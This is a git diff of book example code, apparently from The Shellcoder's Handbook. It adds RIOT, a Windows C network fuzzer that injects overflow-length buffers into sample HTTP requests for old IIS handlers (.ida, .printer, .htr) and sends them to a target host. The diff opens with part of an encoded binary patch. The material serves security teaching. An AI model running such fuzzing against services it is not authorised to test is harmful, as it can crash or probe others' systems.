z1av-HCfNZUN6RETpyOzn)cx4u=oc3p5U(WY@k~cjaSLVBkvP0fW*o*R(tdm_vQ<rl
zF?--Z|0nA6Ux&b&Fe4`3SByCj#~CZgg4>-;6pVrv2%&`$yn29ntVZK0)Wh|Z)IKKJ
zcaqM0@WBUF7GLipiGDL-u1rj7(~QH;_andH$1>IHC}x}ETrj~2#c&~r;R3*A%(Y8D
zaLtljv%X(ansAGsZ;t4?9N~n?w>xm2JUJW*bQSGz4k|7vre$nLml;KD6oWa6nKX*h
zqnJUXIJ41&qed}kqZp@A4Av-4ZWQM?nh2{=bYe7-RHGOau5I=SYno6|E*>0aI;E-K
zx<EW)TPS0}4-Wj90!@|08j2w9jD<nGXNs3KoNyTLn_7x5OyK&UuLZh3EUoVTt&MGS
zKQ?#w-_wA<aeeIH%B7_ecblrGK3n(PX}phL&)14oyzG02+Lf!jU+?Z8%o?TQbkXyJ
zkyPyK-36n&-qT&b1O3DM7OcZc`q!^oANEV^$Bz9O5W-)}X*v2n<-xbw7uPxLpko8s
z?s|6}xh;($ICPmj=Q4TrW%44I$+H&ZZ8H}4$Bw477q`KGYZrEPVXUw30Tx+eABoP}
ztA!?bs#-ZO+|uq6yUXN7vMbkVT_!JlnLM*Kue)v-)nWmy3}g*22pDtk4;h?hi(K_7
zCsE&`>gHY;GxS{lWi*JlqJ#IPF@JX#Yjv+Lj~A%(F6T3R&|T-2k8iL8k11|sVfuc&
zYfQ?{4E;Ou?mSoRW9lwC>@lw40lkL1^UgMwMfzY#=hyG-MlCvubU!?h#dTni2DC$1
z8?#y3fPS624cv!!WNagqNgF6XkxWN|aHJ)IzT-M;J;X9v5=q<ovX1L<N;&>}`*W|y
zqbTR#P!4+&;@D)gZ_DN_MxP%ykWj?cM{jrX_m$L*L}uYs*D;QwRjJO_ihHI!qsO|#
z*xKKJj}dWe?q0*GxCOUn+-9Wly7jCvlB?I<QfYB5sNyr8ON(3hIB}lH7&p#rGj`J@
z({M>&m8-(&D;j-u!wp`spUhVZ?s8Qwn$gP@xl)?0LYiGrRyG6}=uTy~;Z3>oo1-cQ
z`l?4uTYP4{C@$!Ljzsy2eNOK_n)4D{#<J;!gWP;W?^i?F6??J2h#64LVP}%D%k}oV
z*oCJ3jVsWiW5p^KmAg#Tcjq!=7oNp_J~v<7J<AoJE6<NE_QYXyXDbctx+|mV6?>7-
zdHE@$QZCKT8`m*1InS8ZSve!`*1TM?ymA$2YV&2fKcD5F$iDf6AY}U+8TYxhUD#F>
z%!JLx1h(R#GsU`5(fdL!b0V&;qR?w#m!Yx8En|c+LXBFL6&AR6$Z)yYr@pc;^q}rS
z>0-TF%FVik70+r#Uj!#~Wul5}?3vtjwX|rh;>v?7m|m>-Kg)RByFzWBMK5^$<o+m3
zAZ+7Xi~GkmW5P@)xCONjv#3!j=zW9OW2tvd89htxuy^o5YQepin?>A$aZ7jo76TKB
zw}~ZX=I_t`MlVc1?1m{A`#I!#_I5X5w4mO3o8UsStkDWK{+65q=9AvtsT&F&qI!)?
zH2g988q`tscX};3Mb#rWSUk?E?HeCh?s;Sxr|zy*rsvlmeKnyy&jnm6?$uj-gAsVp
zn7zBq$3c~-><^X-*FT=5xv#f%uInLPq1@b^pzfEVua_TttcM);83!l5mlr?WSaeH!
zaBJi!pwkh(L(ktdhYfQNp;)ra$%VcKJK_-3?aXiC_4^yt-Q6&H`e(YcoK!3ICzpS+
zQLMSf;%5Q+P2c?dO}pE$4Yl5=Rx35mE4hH&-kral<+|~Cf=B4*p*gNvrGx&Du9mO_
zJHXZ=i%T${Y9DP6d|VH_G#t`%D*FPyLx8xanJ*<8*YsVBM{@m~-dfkY{}NIZN-X);
zgTGSX|67{3G-U+ulU(lKA+_}1!t&3k`G2d_$NSe>!?SAsUk6ss$N3l78?8?H6%F%R
zv>9r>CS8R$kUlT|_zJ>nB>bJ0@b4nrDe1r068`;`@Zpy5w_Cz5w1i)539m+dpM!X9
zeIDw9jH_O}30QFO`uO1yd{+dX2Co5M25C0~(k=$_9j6W8b>K%Y`g;t{fa?)I0<z)~
zcr!Qvei^*<0=}05&w{+Xp91;a!*TE_@F;i*d<Fakco=N__VPluK0^N*QdCyN^~vJ{
z<o<`0X`}6dwg=iCXnUaTfwl+Q9%y@@?SZxj+8$_opzVRS2ihKJd!X%swg=iCXnUaT
zfwl+Q9%y@@?SZxj+8$_opzVRS2mXJ1fbRxeXn6sH!5g9AT`;~E!7$&$;JXWWKSTfR
zwW~qC`@nZ5)<Jw9f@B)W_aT_acR7MQ)_W~Pei355T@cg01o2%7is>66rt@$3F>Xqn
z`?45ML9|IjEXTcJBsc1@{v8n8E<sG6h770*@g0jA#J=)8SpFcyK0hOT7G(anAm$%}
zSkJeiJD@+3_^TlMa};8G--TH2uOasDpCIP{8^rwea0>ks9IHC`-+IFyj^6p~?6Vss
z<4=F$2VVUXpU?d91-|;BLQfymd;{fw@cO&28-DhZpU?c<PYMa&`k3WSDgS+x|L4~(
zzIL<v>1*%3#=ju3@R+Or=~uPI!<ZNkzx(*RhMIi$iFdayER5JQKRWm03;%`vs!s=&
YONz7;+8$_opzVRS2ihKJdq6z!Kbs2b_W%F@

literal 0
HcmV?d00001

diff --git a/Chapter_14/bin/input_store/1.dat b/Chapter_14/bin/input_store/1.dat
new file mode 100644
index 0000000..b084805
--- /dev/null
+++ b/Chapter_14/bin/input_store/1.dat
@@ -0,0 +1,10 @@
+GET /search.ida?group=kuroto&q=riot HTTP/1.1
+Accept: */*
+Accept-Language: en-us
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/4.0
+Host: 192.168.1.1
+Connection: Keep-Alive
+Cookie: ASPSESSIONIDQNNNNTEG=ODDDDIOANNCXXXXIIMGLLNNG
+
+
diff --git a/Chapter_14/bin/input_store/2.dat b/Chapter_14/bin/input_store/2.dat
new file mode 100644
index 0000000..885e2f9
--- /dev/null
+++ b/Chapter_14/bin/input_store/2.dat
@@ -0,0 +1,9 @@
+GET /eeye.printer?varname=vardat HTTP/1.1
+Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
+Accept-Language: en-us
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/4.0
+Host: www.kuroto.na
+Connection: Keep-Alive
+Cache-Control: no-cache
+
diff --git a/Chapter_14/bin/input_store/3.dat b/Chapter_14/bin/input_store/3.dat
new file mode 100644
index 0000000..63d7a54
--- /dev/null
+++ b/Chapter_14/bin/input_store/3.dat
@@ -0,0 +1,9 @@
+GET /eeye.htr?varname=vardat HTTP/1.1
+Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
+Accept-Language: en-us
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/4.0
+Host: www.kuruoto.na
+Connection: Keep-Alive
+Cache-Control: no-cache
+
diff --git a/Chapter_14/src/FaultInject.cpp b/Chapter_14/src/FaultInject.cpp
new file mode 100644
index 0000000..9f82ccd
--- /dev/null
+++ b/Chapter_14/src/FaultInject.cpp
@@ -0,0 +1,257 @@
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <malloc.h>
+#include "FaultInject.h"
+#include "NetIO.h"
+
+DWORD	audit_vuln_class(
+							struct audit_profile *audit, 
+
+							char *gen_request, 
+
+							DWORD gen_req_size)
+{
+	DWORD errcode = 0;
+
+	errcode = mod_overflow(audit, gen_request, gen_req_size);
+
+	return(errcode);
+}
+
+DWORD buff_size[] =
+{
+	32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,
+	60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,
+	88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,
+	112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,
+	133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,200,210,237,238,239,
+	240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,
+	261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,300,310,400,410,493,
+	494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,
+	515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,600,610,700,
+	710,800,810,900,910,981,982,983,984,985,986,987,988,989,990,991,992,993,994,995,996,
+	997,998,999,1000,1001,1002,1003,1004,1005,1006,1007,1008,1009,1010,1011,1012,1013,1014,
+	1015,1016,1017,1018,1019,1020,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,
+	1032,1033,1034,1035,1036,1037,1038,1039,1040,1041,1042,1043,1044,1100,1200,1300,1400,
+	1500,1600,1700,1800,1900,2000,2010,2029,2030,2031,2032,2033,2034,2035,2036,2037,2038,
+	2039,2040,2041,2042,2043,2044,2045,2046,2047,2048,2049,2050,2051,2052,2053,2054,2055,
+	2056,2057,2058,2059,2060,2061,2062,2063,2064,2065,2066,2067,2068,2100,3000,3010,3100,
+	4000,4010,4077,4078,4079,4080,4081,4082,4083,4084,4085,4086,4087,4088,4089,4090,4091,
+	4092,4093,4094,4095,4096,4097,4098,4099,4100,4101,4102,4103,4104,4105,4106,4107,4108,
+	4109,4110,4111,4112,4113,4114,4115,4116,5000,5010,5100,6000,6010,6100,7000,7010,7100,
+	8000,8010,8100,8173,8174,8175,8176,8177,8178,8179,8180,8181,8182,8183,8184,8185,8186,
+	8187,8188,8189,8190,8191,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8203,
+	8204,8205,8206,8207,8208,8209,8210,8211,8212,9000,9010,9100,9200,9300,9400,9500,9600,
+	9700,9800,9900,9981,9982,9983,9984,9985,9986,9987,9988,9989,9990,9991,9992,9993,9994,
+	9995,9996,9997,9998,9999,10000,10001,10002,10003,10004,10005,10006,10007,10008,10009,
+	10010,10011,10012,10013,10014,10015,10016,10017,10018,10019,10020,10100,10200,10300,
+	10400,10500,10600,10700,10800,10900,11000,12000,13000,14000,15000,16000,16365,16366,
+	16367,16368,16369,16370,16371,16372,16373,16374,16375,16376,16377,16378,16379,16380,
+	16381,16382,16383,16384,16385,16386,16387,16388,16389,16390,16391,16392,16393,16394,
+	16395,16396,16397,16398,16399,16400,16401,16402,16403,16404,17000,18000,19000,20000,
+	32749,32750,32751,32752,32753,32754,32755,32756,32757,32758,32759,32760,32761,32762,
+	32763,32764,32765,32766,32767,32768,32769,32770,32771,32772,32773,32774,32775,32776,
+	32777,32778,32779,32780,32781,32782,32783,32784,32785,32786,32787,32788,65517,65518,
+	65519,65520,65521,65522,65523,65524,65525,65526,65527,65528,65529,65530,65531,65532,
+	65533,65534,65535,65536,65537,65538,65539,65540,65541,65542,65543,65544,65545,65546,
+	65547,65548,65549,65550,65551,65552,65553,65554,65555,65556,0
+};
+
+DWORD	mod_overflow(
+						struct audit_profile *audit, 
+
+						char *gen_request, 
+
+						DWORD gen_req_size)
+{
+	DWORD	cur_size = 0,
+			i = 0,
+			retcode;
+
+	if(audit->vec.high > gen_req_size || audit->vec.low < 0)
+
+		return(INVALID_VECTOR_RANGE);
+
+	for (i = 0 ; buff_size[i] != 0 ; i++)
+	{
+		cur_size=buff_size[i];
+
+		if((retcode = overflow_engine(audit, gen_request, gen_req_size,cur_size)) == -1)
+			break;
+	}
+
+	return(retcode);
+}
+
+
+#define 	OP_VAL	+1
+#define 	CL_VAL	-1
+#define		AS_VAL	 1
+#define		DE_VAL	+1
+
+DWORD	overflow_engine(	struct audit_profile *audit, 
+
+							char *gen_request, 
+
+							DWORD gen_req_size,
+
+							DWORD buf_size)
+{
+	DWORD	shift_pos = 0,
+
+			delim_id = 0,
+
+			send_size = 0,
+
+			fixed_size = 0,
+
+			mod_req_size = 0,
+
+			fault_inj_pos[2]	= { 0 , 0 },
+
+			fault_cnt = 0;
+
+	char	*mod_request;
+
+	char	fault[MAXBLOCK];
+
+	mod_req_size = (gen_req_size+MAXBLOCK+FIXUP_PAD);
+
+	mod_request = (char *)calloc(mod_req_size,1);
+
+	for(shift_pos = audit->vec.low; shift_pos < audit->vec.high; shift_pos++)
+	{
+		if(!isalpha(gen_request[shift_pos]) && !isdigit(gen_request[shift_pos]) && gen_request[shift_pos] < 0x7F) 
+		{
+			switch(gen_request[shift_pos])
+			{
+				case '=':
+				case '-':
+				case '_':
+				case '^':
+				case '&':
+				case ' ':
+				case '+':
+				case ':':
+
+						fault_inj_pos[0]	=	OP_VAL;
+
+						fault_inj_pos[1]	=	CL_VAL;
+
+						fault_cnt			=	2;
+
+						break;
+
+				case '(':
+				case '{':
+				case '[':
+				case '<':
+
+						fault_inj_pos[0]	=	OP_VAL;
+
+						fault_cnt			=	1;
+
+						break;
+
+				case ')':
+				case '}':
+				case ']':
+				case '>':
+
+						fault_inj_pos[0]	=	CL_VAL;
+
+						fault_cnt			=	1;
+
+						break;
+
+				default:
+
+						fault_inj_pos[0]	=	DE_VAL;
+
+						fault_cnt			=	1;
+
+						break;
+			}
+			
+			for(;fault_cnt > 0;fault_cnt--)
+			{
+					memset(fault,gen_request[shift_pos+fault_inj_pos[fault_cnt-1]],buf_size);
+
+					send_size = insert_mod(		gen_request, 
+
+												gen_req_size, 
+
+												mod_request,
+
+												mod_req_size, 
+
+												fault, 
+
+												buf_size, 
+												
+												shift_pos+fault_inj_pos[fault_cnt-1]
+											);
+
+				if(audit->fixup.active)
+				{
+					if((fixed_size = audit->fixup.fixup_func(mod_request,&send_size,mod_req_size)) != NO_FIXUPS)
+						send_size = fixed_size;
+				}
+				
+				if(initialize_deliver(audit) == -1)
+				{
+					fprintf(stderr,"Remote service not responding... \n");
+					
+					return(-1);
+				} 
+				
+				fprintf(stderr,
+					
+						"Input Size: %05d  Offset: %05d  Fault Size: %05d\n",
+					
+						gen_req_size,
+						shift_pos+fault_inj_pos[fault_cnt-1],
+						buf_size,
+						send_size);
+
+				deliver_data(audit->connected_sock,mod_request,send_size);
+			
+				release_deliver(audit);
+			}
+		}
+	}
+
+	return(0);
+}
+
+DWORD insert_mod(	char *gen_data,
+
+					DWORD gen_data_size, 
+
+					char *mod_data, 
+
+					DWORD mod_data_size, 
+
+					char *fault_obj, 
+
+					DWORD fault_obj_size, 
+
+					DWORD inj_pos)
+{
+	DWORD total=0;
+
+	DWORD block_size=0;
+
+	memset(mod_data,0x00,mod_data_size);
+
+	memcpy(mod_data,gen_data,inj_pos);
+	
+	memcpy(mod_data+inj_pos,fault_obj,fault_obj_size);
+	
+	memcpy(mod_data+inj_pos+fault_obj_size,&gen_data[inj_pos],gen_data_size-inj_pos);
+	
+	total = gen_data_size+fault_obj_size;
+
+	return(total);
+}
diff --git a/Chapter_14/src/FaultInject.h b/Chapter_14/src/FaultInject.h
new file mode 100644
index 0000000..9062dd7
--- /dev/null
+++ b/Chapter_14/src/FaultInject.h
@@ -0,0 +1,83 @@
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+#define	ENGINE_ERROR			-1
+
+#define ENGINE_SHUTDOWN			-2
+
+#define NO_ENGINE_SELECTED		-3
+
+#define FIXUP_ERROR				-4
+
+#define NO_FIXUPS				-5
+
+#define INVALID_VECTOR_RANGE	-6
+
+#define MAXBLOCK				65556
+
+#define FIXUP_PAD				128
+
+/* Attack Classes */
+
+#define	BUFFER_OVERFLOW			1
+
+typedef int (WINAPI *LPFUNC)(char *,DWORD *,DWORD);
+
+struct vector
+{
+	BOOL	active;
+
+	DWORD	low;
+
+	DWORD	high;
+};
+
+/* Post Processing Hooks */
+
+struct fixup
+{
+	BOOL	active;
+
+	LPFUNC	fixup_func;
+};
+
+struct delivery
+{
+	BOOL	active;
+
+	LPFUNC	hook;
+};
+
+/* end hooks */
+
+struct audit_profile
+{
+	DWORD	audit_type;
+
+	DWORD	vuln_class;
+
+	DWORD	connected_sock;
+
+	char	*host;	
+
+	WORD	port;
+
+	DWORD	input_size;
+
+	char	*input_session;
+
+	struct	vector	vec;
+	
+	struct	fixup	fixup;
+};
+
+DWORD audit_vuln_class(struct audit_profile *audit, char *gen_request, DWORD gen_req_size);
+
+DWORD overflow_engine(struct audit_profile *audit, char *gen_request, DWORD gen_req_size,DWORD cur_size);
+
+DWORD mod_overflow(struct audit_profile *audit, char *gen_request, DWORD gen_req_size);
+
+DWORD insert_mod(char *gen_data, DWORD gen_data_size, char *mod_data, DWORD mod_data_size, char *fault_obj, DWORD fault_obj_size, DWORD inj_pos);
+
+DWORD __stdcall fixup_bodydata(char *mod_request, DWORD *mod_req_size,DWORD max_mod_size);
diff --git a/Chapter_14/src/NetIO.cpp b/Chapter_14/src/NetIO.cpp
new file mode 100644
index 0000000..f2d5588
--- /dev/null
+++ b/Chapter_14/src/NetIO.cpp
@@ -0,0 +1,305 @@
+#ifndef _WINSOCKAPI_
+#define _WINSOCKAPI_
+#endif
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <winsock2.h>
+#pragma comment(lib, "ws2_32.lib")
+#include "FaultInject.h"
+#include "NetIO.h"
+
+#define NETIO_DEBUG 0
+
+DWORD	tcp_connect(
+						char *host, 
+
+						WORD port)
+{	
+	DWORD	SockFD = 0;
+
+	DWORD	nb_io = 1;
+
+	DWORD	option = 0;
+
+	struct	linger lin;
+
+	struct	sockaddr_in DstSAin;
+
+	BOOL	disable_nagle;
+
+	
+	DstSAin.sin_family = AF_INET;
+
+	DstSAin.sin_port = htons(port);
+
+	DstSAin.sin_addr.s_addr= inet_addr(host);	
+
+	if((SockFD = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0)) == INVALID_SOCKET)
+	{
+
+		if(NETIO_DEBUG)
+		fprintf(stderr,
+
+			"[%08X] Error: Unable to allocate socket\n"
+
+		,WSAGetLastError());
+	
+		return(-1);
+	}
+
+	if((WSAConnect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin),NULL,NULL,NULL,NULL)) == SOCKET_ERROR)
+	{
+		if(NETIO_DEBUG)
+		fprintf(stderr,
+
+			"[%08X] Error: Unable to connect to %s:%d\n"
+		
+		,WSAGetLastError(),host,port);
+
+		closesocket(SockFD);
+	
+		return(-1);
+	}
+
+	if((ioctlsocket(SockFD,FIONBIO,&nb_io)) == SOCKET_ERROR)
+	{
+		if(NETIO_DEBUG)
+		fprintf(stderr,
+			
+			"[%08X] Error: Unable to set IO mode of socket %d\n"
+		
+		,WSAGetLastError(),SockFD);
+	
+		closesocket(SockFD);
+
+		return(-1);
+	}
+
+	lin.l_onoff = 1;
+
+	lin.l_linger = 0;
+
+	if((setsockopt(SockFD,SOL_SOCKET,SO_LINGER,(const char *)&lin,sizeof(lin))) == SOCKET_ERROR)
+	{
+		if(NETIO_DEBUG)
+		fprintf(stderr,
+			
+			"[%08X] Error: Unable to set socket option SO_LINGER on socket %d\n"
+		
+		,WSAGetLastError(),SockFD);
+		
+		closesocket(SockFD);
+
+		return(-1);
+	}
+
+	disable_nagle = TRUE;
+		
+	if((setsockopt(SockFD,IPPROTO_TCP,TCP_NODELAY,(const char *)&disable_nagle,sizeof(disable_nagle))) == SOCKET_ERROR)
+	{
+		if(NETIO_DEBUG)
+		fprintf(stderr,
+			
+			"[%08X] Error: Unable to set socket option TCP_NODELAY on socket %d\n"
+		
+		,WSAGetLastError(),SockFD);
+		
+		closesocket(SockFD);
+		
+		return(-1);
+	}
+
+	return(SockFD);
+}
+
+DWORD	GetData(	
+					DWORD SockFD,
+
+					char *buffer,
+
+					DWORD read_size
+				)
+{
+	WSABUF wsrecv_buff;
+
+	DWORD	bytes_recv = 0;
+
+	DWORD	t = 0;
+
+	DWORD	Flags = 0;
+
+	DWORD	errcode = 0;
+
+	BOOL	data_start = FALSE;
+
+	struct timeval read_timeing;
+
+	fd_set	readfs;
+
+
+	FD_ZERO(&readfs);
+
+    FD_SET(SockFD, &readfs);
+
+	wsrecv_buff.len = read_size;
+
+	wsrecv_buff.buf = buffer;
+
+	read_timeing.tv_sec = 0;
+
+	read_timeing.tv_usec = 100;
+
+	if((t = select(SockFD, NULL, &readfs, NULL, &read_timeing)) == SOCKET_ERROR)
+	{     
+		if(NETIO_DEBUG)
+		fprintf(stderr,
+			
+			"[%08X] Select: Unable to determine status of socket %d\n",
+			
+		WSAGetLastError(),SockFD);
+	
+		return(READ_ERROR);
+	} 
+
+	if (FD_ISSET(SockFD,&readfs))
+	{
+		if(errcode = WSARecv(SockFD,&wsrecv_buff,1,&bytes_recv,&Flags,0,0))
+		{
+			errcode = GetLastError();
+
+			if(	errcode == WSAENOTCONN		|| 
+				errcode == WSAECONNRESET	|| 
+				errcode == WSAETIMEDOUT		|| 
+				errcode == WSAECONNABORTED	)
+			
+				return(READ_ERROR);
+
+			if(errcode == WSAEWOULDBLOCK)
+			
+				return READ_NODATA;
+		}
+		
+		if(bytes_recv > 0)
+		{
+			buffer[bytes_recv-1]='\0';
+		
+			return 0;
+		}
+		else
+		{
+			if(errcode)
+				return READ_ERROR;
+			else
+				return READ_TIMEOUT;
+		}
+	} else
+	{
+		return(READ_ERROR);
+	}
+}
+
+DWORD	SendData(	
+					DWORD SockFD, 
+
+					char *data,
+					
+					DWORD data_size)
+{
+	WSABUF	send_buff;
+
+	DWORD	bytes_sent;
+
+	DWORD	rc = 0;
+
+	DWORD	t = 0;
+
+	DWORD	errcode = 0;
+
+	fd_set	writefs;
+
+	struct timeval write_timeing;
+
+	
+	FD_ZERO(&writefs);
+
+    FD_SET(SockFD, &writefs);
+
+	write_timeing.tv_sec = 1;
+	
+	write_timeing.tv_usec = 0;
+
+	send_buff.len = data_size;
+
+	send_buff.buf = data;
+
+	if((t = select(SockFD, NULL, &writefs, NULL, &write_timeing)) == SOCKET_ERROR)
+	{      
+		if(NETIO_DEBUG)
+		fprintf(stderr,
+			
+			"[%08X] Select: Unable to determine status of socket %d\n"
+		
+		,WSAGetLastError(),SockFD);
+		
+		return(WRITE_ERROR);
+	} 
+
+	if (FD_ISSET(SockFD,&writefs))
+	{
+		if(WSASend(SockFD,&send_buff,1,&bytes_sent,0,0,0))
+		{
+			errcode = GetLastError();
+		
+			if(errcode == WSAENOTCONN || errcode == WSAECONNRESET || errcode == WSAETIMEDOUT || errcode == WSAECONNABORTED || errcode == WSAENOTSOCK)
+			{
+				if(NETIO_DEBUG)
+				fprintf(stderr,
+				
+					"[%08X] Error: Unable to determine status of socket %d\n"
+				
+				,errcode,SockFD);
+			
+				return(WRITE_ERROR);
+			}
+		} 
+	}
+
+	return rc;
+}
+
+DWORD initialize_deliver( struct audit_profile *audit )
+{
+	if((audit->connected_sock = tcp_connect(audit->host, audit->port)) == -1)
+	{
+		if(NETIO_DEBUG)
+		fprintf(stderr,
+			
+			"[%08X] Error: Failed to make TCP connection to remote service\n"
+		
+		,audit->connected_sock);
+	
+		return(-1);
+	}
+
+	return(0);
+}
+
+DWORD release_deliver( struct audit_profile *audit )
+{
+	closesocket(audit->connected_sock);
+
+	return(0);
+}
+
+DWORD deliver_data(DWORD SockFD, char *data,DWORD data_size)
+{
+	char recv_buffer[1024];
+
+	if(SendData(SockFD, data,data_size) == -1)
+		return(-1);
+
+	GetData(SockFD,(char *)&recv_buffer,sizeof(recv_buffer)-1);
+	
+	return(0);
+}
diff --git a/Chapter_14/src/NetIO.h b/Chapter_14/src/NetIO.h
new file mode 100644
index 0000000..c80fb0a
--- /dev/null
+++ b/Chapter_14/src/NetIO.h
@@ -0,0 +1,24 @@
+#define SOCK_ERROR		-1
+
+#define CONN_ERROR		-2
+
+#define READ_ERROR		-3
+
+#define READ_TIMEOUT	-4
+
+#define READ_NODATA		-5
+
+#define WRITE_ERROR		-6
+
+
+DWORD	initialize_deliver(struct audit_profile *audit);
+
+DWORD	release_deliver(struct audit_profile *audit);
+
+DWORD	deliver_data(DWORD SockFD, char *data,DWORD data_size);
+
+DWORD	tcp_connect(char *target, WORD port);
+
+DWORD	GetData(DWORD SockFD,char *buffer,DWORD read_size);
+
+DWORD	SendData(DWORD SockFD, char *data,DWORD data_size);
diff --git a/Chapter_14/src/RIOT.cpp b/Chapter_14/src/RIOT.cpp
new file mode 100644
index 0000000..0994b57
--- /dev/null
+++ b/Chapter_14/src/RIOT.cpp
@@ -0,0 +1,237 @@
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include "FaultInject.h"
+#include "NetIO.h"
+
+int main(int argc, char **argv)
+{
+	struct		audit_profile audit;
+
+	HANDLE		resp_file;
+
+	DWORD		resp_filesize = 0,
+
+				filesize_high = 0,
+				
+				msg_size = 0,
+				
+				bytes_read = 0,
+				
+				count = 0,
+				
+				retcode = 0,
+				
+				id = 0;
+
+	char		resp_filename[256];
+
+	char		*resp;
+	
+	WSADATA		wsaData;
+
+	if(argc != 3)
+	{	
+		fprintf(stderr, 
+		
+			"\n"
+			"RIOT v0.1 - SWIFI example for Shellcoders Handbook\n"
+			"Riley Hassell <rhassell@eeye.com>\n"
+			"----------------------------------------------------------\n"
+			"Usage: %s <target_ip> <port>\n"
+			"\n"
+
+		,argv[0],argv[0]);
+		return(-1);
+	}
+
+	audit.host = argv[1];
+
+	audit.port = atoi(argv[2]);
+
+	/*
+	 *  FIXUPS
+	 *
+	 *	Sometimes when inject faults we may compromise the intregity of
+	 *  of our input data. Checksums, length fields, as well as other 
+	 *  characteristics of the data that guarantee must be "fixed". 
+	 * 
+	 *  To solve these issues we can create a "fixup" function that when
+	 *  supplied will recalculate neccessary checkums and lengths and store 
+	 *  them in their appropriate field within the packet.
+	 *  
+	 */
+
+	audit.fixup.active = TRUE;
+	
+	audit.fixup.fixup_func = (LPFUNC)fixup_bodydata;
+
+	/*
+	 *	Initiallize Winsock interface
+	 */
+
+	if (WSAStartup(MAKEWORD(2,1), &wsaData) != 0)
+	{
+		fprintf(stderr, "[%08X] Error: WSAStartup failed\n",GetLastError());
+		ExitProcess(-1);
+	}
+
+	/*
+	 * RETRIEVE INPUT
+	 *
+	 * We will iterate through each test input located in our "input_store"
+	 * directory. Our input files should be named numerically starting at "1." 
+	 * So if we had 3 test inputs then their fielnames would be:
+	 *
+	 *	1.dat
+	 *	2.dat
+	 *	3.dat
+	 *
+	 * Our testing ends when Createfile() fails to open a nonexistent test input 
+	 * file. For example: If we had 3 test inputs and 4.dat did not exist, then
+	 * RIOT would cleanup and exit.
+	 *
+	 */
+
+	for( id = 1 ;; id++ ) 
+	{
+		memset(&resp_filename,0x00,sizeof(resp_filename));
+		
+		_snprintf(resp_filename, sizeof(resp_filename)-1,"input_store\\%d.dat",id);
+
+		resp_filename[sizeof(resp_filename)-1] = 0;
+		
+		if((resp_file = CreateFile(resp_filename,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0)) == INVALID_HANDLE_VALUE)
+		{
+			fprintf(stderr,"[%08X] Error: Unable to open file \"%s\"\n",GetLastError(),resp_filename);
+		
+			break;
+		}
+
+		resp_filesize = 0;
+		
+		filesize_high = 0;
+
+		if((resp_filesize = GetFileSize(resp_file,&filesize_high)) == INVALID_FILE_SIZE)
+		{
+			fprintf(stderr,"[%08X] Error: Unable to query filesize\n",GetLastError());
+		
+			break;
+		}
+
+		resp = (char *)calloc(resp_filesize+1,1);
+
+		if(!ReadFile(resp_file,resp,resp_filesize,&bytes_read,NULL))
+		{
+			fprintf(stderr,"[%08X] Error: Unable to read input data from %s\n",GetLastError(),resp_filename);
+		
+			break;
+		}
+
+		if(!CloseHandle(resp_file))
+		{
+			fprintf(stderr,"[%08X] Error: Unable to close msg handle\n",GetLastError());
+		
+			break;
+		}
+
+		audit.vec.active	= TRUE;
+
+		audit.vec.low		= 0;
+
+		audit.vec.high		= bytes_read;
+
+		audit.fixup.active = TRUE;
+
+		audit.fixup.fixup_func = (LPFUNC)fixup_bodydata;
+	
+		if(audit_vuln_class(&audit,resp,bytes_read) == -1)
+		{
+			fprintf(stderr,"Audit Aborted\n");
+			break;
+		}
+
+		free(resp);
+	}
+
+	fprintf(stderr,"Audit Complete\n");
+
+	return(0);
+}
+
+DWORD __stdcall fixup_bodydata(
+								char *mod_request, 
+
+								DWORD *mod_req_size,
+
+								DWORD max_mod_size)
+{
+	DWORD	bodydata_size = 0,
+
+			conlen_size = 0,
+
+			new_conlen_size = 0,
+
+			new_session_size = 0,
+
+			test = 0,
+
+			x = 0;
+
+	char	*datastart,
+	
+			*postdata,
+			
+			*pcon_len,
+			
+			*conlen_end;
+
+	char	conlenbuffer[30];
+
+	if( (*mod_req_size + 128) > max_mod_size )
+		return(NO_FIXUPS);
+
+	if((datastart = strstr(mod_request, "\r\n\r\n")) == NULL)
+		return(NO_FIXUPS);
+	
+	datastart += 4;
+
+	/* Get size of body data */
+	bodydata_size = *mod_req_size - (datastart - mod_request);
+
+	/* Find Content-Length: */
+	if((pcon_len = strstr(mod_request,"Content-Length:")) == NULL)
+			return(NO_FIXUPS);
+
+	postdata = (char *)malloc(bodydata_size+1);
+
+	if(postdata == NULL)
+	{
+		return(NO_FIXUPS);
+		exit(-1);
+	}
+
+	memset(mod_request,0x00,bodydata_size+1);
+
+	memcpy(mod_request,datastart,bodydata_size);
+
+	if((conlen_end = strstr(pcon_len,"\r\n")) == NULL)
+		return(NO_FIXUPS);
+
+	conlen_size = (conlen_end - pcon_len);
+	
+	new_conlen_size = _snprintf(conlenbuffer,30-1,"Content-Length: %d",bodydata_size);
+
+	if((test = new_conlen_size-conlen_size)<0)
+		return(NO_FIXUPS);
+
+	memmove(conlen_end+test,conlen_end,bodydata_size);
+
+	memcpy(pcon_len,conlenbuffer,new_conlen_size);
+
+	*mod_req_size = *mod_req_size+test;
+
+	free(postdata);
+	
+	return(0);
+};
